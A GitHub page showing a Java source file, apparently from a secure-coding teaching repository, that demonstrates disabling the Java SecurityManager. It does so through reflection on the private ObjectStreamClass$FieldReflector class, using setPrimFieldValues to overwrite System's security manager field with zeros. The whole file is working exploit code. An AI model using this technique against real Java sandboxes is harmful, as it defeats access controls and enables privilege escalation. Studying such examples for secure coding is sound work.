forked from rcseacord/JavaSCR
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathUnSecurityManager.java
More file actions
64 lines (51 loc) · 2.54 KB
/
Copy pathUnSecurityManager.java
File metadata and controls
64 lines (51 loc) · 2.54 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
package acc04j;
import java.lang.reflect.*;
import java.io.*;
class UnSecurityManager {
public static void main(String[] argv) {
try {
SecurityManager sm = System.getSecurityManager();
if (sm != null) {
System.out.println("Security manager installed.");
} else {
System.out.println("No security manager.");
}
try {
System.setProperty("acc04j.options", "privileged");
} catch (java.security.AccessControlException ace) {
System.out.println(ace.getMessage());
}
// Creates an ObjectStreamField representing a serializable field with the named s with type long.
ObjectStreamField osf = new ObjectStreamField("s", long.class);
ObjectStreamField osfArray[] = new ObjectStreamField[] { osf };
// FieldReflector is a private static class for setting and retrieving serializable field values
Class<?> FieldReflector = Class.forName("java.io.ObjectStreamClass$FieldReflector");
Constructor<?> FieldReflector_ctor = FieldReflector.getDeclaredConstructors()[0];
FieldReflector_ctor.setAccessible(true);
Object fr = FieldReflector_ctor.newInstance(new Object[] { osfArray });
System.out.println(fr);
// FieldReflector.writeKeys is the unsafe fields keys for writing fields
Field writeKeys_field = fr.getClass().getDeclaredField("writeKeys");
writeKeys_field.setAccessible(true);
writeKeys_field.set(fr, new long[] { 116 });
// The setPrimFieldValues method sets the serializable primitive fields of an object using values
// unmarshalled from a byte array starting at offset 0.
Method setPrimFieldValues = fr.getClass().getDeclaredMethod("setPrimFieldValues", Object.class, byte[].class);
setPrimFieldValues.setAccessible(true);
System.out.println(System.getSecurityManager());
// Overwrite the security manager for the system with null (zeros).
byte zeros[] = new byte[8];
setPrimFieldValues.invoke(fr, System.class, zeros);
sm = System.getSecurityManager();
if (sm != null) {
System.out.println("Security manager installed.");
} else {
System.out.println("No security manager.");
}
System.setProperty("acc04j.options", "privileged");
} catch (IllegalAccessException | IllegalArgumentException | InvocationTargetException | NoSuchMethodException
| SecurityException | NoSuchFieldException | InstantiationException | ClassNotFoundException e) {
e.printStackTrace();
}
} // end main()
} // end class UnSecuritymanager